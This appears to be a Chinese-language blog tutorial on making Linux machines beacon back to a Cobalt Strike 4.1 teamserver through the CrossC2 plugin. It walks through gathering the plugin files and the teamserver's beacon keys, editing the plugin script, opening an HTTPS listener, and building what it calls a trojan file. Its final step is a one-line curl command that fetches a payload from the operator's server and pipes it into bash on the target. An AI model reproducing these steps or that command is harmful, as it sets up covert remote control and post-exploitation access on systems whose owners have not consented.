一、前言
cobaltstrike 4.1上线linux,看了许多大佬的博客终于弄成功了,过程有点难艰辛,花了好大会时间才上线成功。
前提:有vps,vps上面装了cobaltstrike 4.1
二、安装插件
cobaltstrike 4.1、cs服务端(ubuntu)是在vps上的、客户端是在win10
(1)下载相关文件
https://github.com/gloxec/CrossC2/releases
下载三个文件,复制一个文件:
CrossC2.cna 加载该插件的cna 是2.2.5- stable中的CrossC2_old.cna,我这里把文件名改了
genCrossC2.win.exe 生成payload的程序 在v2.2.4 - stable
CrossC2Kit.zip 后渗透linux的插件 在v2.2.5 – stable
.cobaltstrike.beacon_keys 从vps上teamserver的所在目录复制出来,注意在vps上是隐藏文件(2)在win10创建一个文件夹,把以上文件放进去,注意genCrossC2.win.zip的内容也全部放在这个页面了
我这边是都解压好的
(3)修改CrossC2.can文件中的内容
$CC2_PATH 一定要绝对路径$CC2_BIN 就是exe文件了
再把outoutfileName的值去掉/tmp,windows10不存在tmp目录所以将cs直接生成木马文件在根目录下
(4)导入插件
我这里导入过了
三、上线
1、开启监听
payload一定得选https,其余默认
2、制作木马文件
打开genCrossC2
导入keys和选择刚刚的监听,Build
生成一个payload
3、上线
把刚刚生成的payload放到linux中去执行
curl -A O -o- -L http://ip:55413/a | bash -s
成功linux 成功上线
图表视图
准备的CrossC2Kit.cna插件没用到,上线后才能用的,是linux后渗透插件
